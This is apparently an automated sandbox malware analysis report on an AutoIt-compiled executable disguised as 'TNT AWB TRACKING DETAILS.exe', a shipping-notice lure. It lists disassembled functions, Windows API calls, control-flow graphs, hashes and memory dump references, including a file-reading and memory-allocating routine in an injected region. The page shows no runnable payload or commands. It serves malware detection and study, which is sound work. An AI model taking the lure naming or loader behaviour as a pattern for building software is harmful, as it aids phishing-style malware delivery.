                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                      Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                      • RegisterClassExW.USER32(?), ref: 0041045D
                                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00BE8EF8,000000FF,00000000), ref: 00410552
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                      Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _malloc
                                      • String ID: Default
                                      • API String ID: 1579825452-753088835
                                      • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                      • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                      • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                      • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                      Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2036 40f5c0-40f5cf call 422240 2039 40f5d0-40f5e8 2036->2039 2039->2039 2040 40f5ea-40f613 call 413650 call 410e60 2039->2040 2045 40f614-40f633 call 414d04 2040->2045 2048 40f691 2045->2048 2049 40f635-40f63c 2045->2049 2050 40f696-40f69c 2048->2050 2051 40f660-40f674 call 4150d1 2049->2051 2052 40f63e 2049->2052 2056 40f679-40f67c 2051->2056 2053 40f640 2052->2053 2055 40f642-40f650 2053->2055 2057 40f652-40f655 2055->2057 2058 40f67e-40f68c 2055->2058 2056->2045 2059 40f65b-40f65e 2057->2059 2060 425d1e-425d3e call 4150d1 call 414d04 2057->2060 2061 40f68e-40f68f 2058->2061 2062 40f69f-40f6ad 2058->2062 2059->2051 2059->2053 2072 425d43-425d5f call 414d30 2060->2072 2061->2057 2063 40f6b4-40f6c2 2062->2063 2064 40f6af-40f6b2 2062->2064 2066 425d16 2063->2066 2067 40f6c8-40f6d6 2063->2067 2064->2057 2066->2060 2069 425d05-425d0b 2067->2069 2070 40f6dc-40f6df 2067->2070 2069->2055 2073 425d11 2069->2073 2070->2057 2072->2050 2073->2066
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_fseek_memmove_strcat
                                      • String ID: AU3!$EA06
                                      • API String ID: 1268643489-2658333250
                                      • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                      • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                      • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                      • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                      Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2076 401100-401111 2077 401113-401119 2076->2077 2078 401179-401180 2076->2078 2079 401144-40114a 2077->2079 2080 40111b-40111e 2077->2080 2078->2077 2081 401182 2078->2081 2084 401184-40118e call 401250 2079->2084 2085 40114c-40114f 2079->2085 2080->2079 2083 401120-401126 2080->2083 2082 40112c-401141 DefWindowProcW 2081->2082 2083->2082 2087 42b038-42b03f 2083->2087 2090 401193-40119a 2084->2090 2088 401151-401157 2085->2088 2089 40119d 2085->2089 2087->2082 2095 42b045-42b059 call 401000 call 40e0c0 2087->2095 2093 401219-40121f 2088->2093 2094 40115d 2088->2094 2091 4011a3-4011a9 2089->2091 2092 42afb4-42afc5 call 40f190 2089->2092 2091->2083 2096 4011af 2091->2096 2092->2090 2093->2083 2099 401225-42b06d call 468b0e 2093->2099 2097 401163-401166 2094->2097 2098 42b01d-42b024 2094->2098 2095->2082 2096->2083 2103 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2096->2103 2104 4011db-401202 SetTimer RegisterWindowMessageW 2096->2104 2106 42afe9-42b018 call 40f190 call 401a50 2097->2106 2107 40116c-401172 2097->2107 2098->2082 2105 42b02a-42b033 call 4370f4 2098->2105 2099->2090 2104->2090 2114 401204-401216 CreatePopupMenu 2104->2114 2105->2082 2106->2082 2107->2083 2116 401174-42afde call 45fd57 2107->2116 2116->2082 2127 42afe4 2116->2127 2127->2090
                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                      • CreatePopupMenu.USER32 ref: 00401204
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                      • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                      • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                      • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                      Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                                      APIs
                                      • _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • std::exception::exception.LIBCMT ref: 00411626
                                      • std::exception::exception.LIBCMT ref: 00411640
                                      • __CxxThrowException@8.LIBCMT ref: 00411651
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                      • String ID: ,*H$4*H$@fI
                                      • API String ID: 615853336-1459471987
                                      • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                      • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                      • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                      • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                      Function 03F3BE80 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2147 3f3be80-3f3bf2e call 3f39870 2150 3f3bf35-3f3bf5b call 3f3cd90 CreateFileW 2147->2150 2153 3f3bf62-3f3bf72 2150->2153 2154 3f3bf5d 2150->2154 2159 3f3bf74 2153->2159 2160 3f3bf79-3f3bf93 VirtualAlloc 2153->2160 2155 3f3c0ad-3f3c0b1 2154->2155 2157 3f3c0f3-3f3c0f6 2155->2157 2158 3f3c0b3-3f3c0b7 2155->2158 2161 3f3c0f9-3f3c100 2157->2161 2162 3f3c0c3-3f3c0c7 2158->2162 2163 3f3c0b9-3f3c0bc 2158->2163 2159->2155 2164 3f3bf95 2160->2164 2165 3f3bf9a-3f3bfb1 ReadFile 2160->2165 2166 3f3c102-3f3c10d 2161->2166 2167 3f3c155-3f3c16a 2161->2167 2168 3f3c0d7-3f3c0db 2162->2168 2169 3f3c0c9-3f3c0d3 2162->2169 2163->2162 2164->2155 2174 3f3bfb3 2165->2174 2175 3f3bfb8-3f3bff8 VirtualAlloc 2165->2175 2176 3f3c111-3f3c11d 2166->2176 2177 3f3c10f 2166->2177 2170 3f3c17a-3f3c182 2167->2170 2171 3f3c16c-3f3c177 VirtualFree 2167->2171 2172 3f3c0eb 2168->2172 2173 3f3c0dd-3f3c0e7 2168->2173 2169->2168 2171->2170 2172->2157 2173->2172 2174->2155 2178 3f3bffa 2175->2178 2179 3f3bfff-3f3c01a call 3f3cfe0 2175->2179 2180 3f3c131-3f3c13d 2176->2180 2181 3f3c11f-3f3c12f 2176->2181 2177->2167 2178->2155 2187 3f3c025-3f3c02f 2179->2187 2184 3f3c14a-3f3c150 2180->2184 2185 3f3c13f-3f3c148 2180->2185 2183 3f3c153 2181->2183 2183->2161 2184->2183 2185->2183 2188 3f3c062-3f3c076 call 3f3cdf0 2187->2188 2189 3f3c031-3f3c060 call 3f3cfe0 2187->2189 2195 3f3c07a-3f3c07e 2188->2195 2196 3f3c078 2188->2196 2189->2187 2197 3f3c080-3f3c084 CloseHandle 2195->2197 2198 3f3c08a-3f3c08e 2195->2198 2196->2155 2197->2198 2199 3f3c090-3f3c09b VirtualFree 2198->2199 2200 3f3c09e-3f3c0a7 2198->2200 2199->2200 2200->2150 2200->2155
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F3BF51
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F3C177
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                      • Instruction ID: 5216b2bc177de98aeaa0b411d5b7a0d336266b7fc6d56dec89a528c021761352
                                      • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                      • Instruction Fuzzy Hash: 52A11575E00209EBDB14CFA4C894BEEBBB5FF49304F248199E515BB290C7759A81CFA4
                                      Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2201 4102b0-4102c5 SHGetMalloc 2202 4102cb-4102da SHGetDesktopFolder 2201->2202 2203 425dfd-425e0e call 433244 2201->2203 2204 4102e0-41031a call 412fba 2202->2204 2205 41036b-410379 2202->2205 2213 410360-410368 2204->2213 2214 41031c-410331 SHGetPathFromIDListW 2204->2214 2205->2203 2211 41037f-410384 2205->2211 2213->2205 2215 410351-41035d 2214->2215 2216 410333-41034a call 412fba 2214->2216 2215->2213 2216->2215
                                      APIs
                                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                      • _wcsncpy.LIBCMT ref: 004102ED
                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                      • _wcsncpy.LIBCMT ref: 00410340
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                      • String ID: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                      • API String ID: 3170942423-3238095357
                                      • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                      • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                      • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                      • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                      Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2219 401250-40125c 2220 401262-401293 call 412f40 call 401b80 2219->2220 2221 4012e8-4012ed 2219->2221 2226 4012d1-4012e2 KillTimer SetTimer 2220->2226 2227 401295-4012b5 2220->2227 2226->2221 2228 4012bb-4012bf 2227->2228 2229 4272ec-4272f2 2227->2229 2232 4012c5-4012cb 2228->2232 2233 42733f-427346 2228->2233 2230 4272f4-427315 Shell_NotifyIconW 2229->2230 2231 42731a-42733a Shell_NotifyIconW 2229->2231 2230->2226 2231->2226 2232->2226 2234 427393-4273b4 Shell_NotifyIconW 2232->2234 2235 427348-427369 Shell_NotifyIconW 2233->2235 2236 42736e-42738e Shell_NotifyIconW 2233->2236 2234->2226 2235->2226 2236->2226
                                      APIs
                                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                      • String ID:
                                      • API String ID: 3300667738-0
                                      • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                      • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                      Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpen
                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                      • API String ID: 1586453840-614718249
                                      • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                      • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                      • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                      • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                      Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                      • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                      • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                      • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                      Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
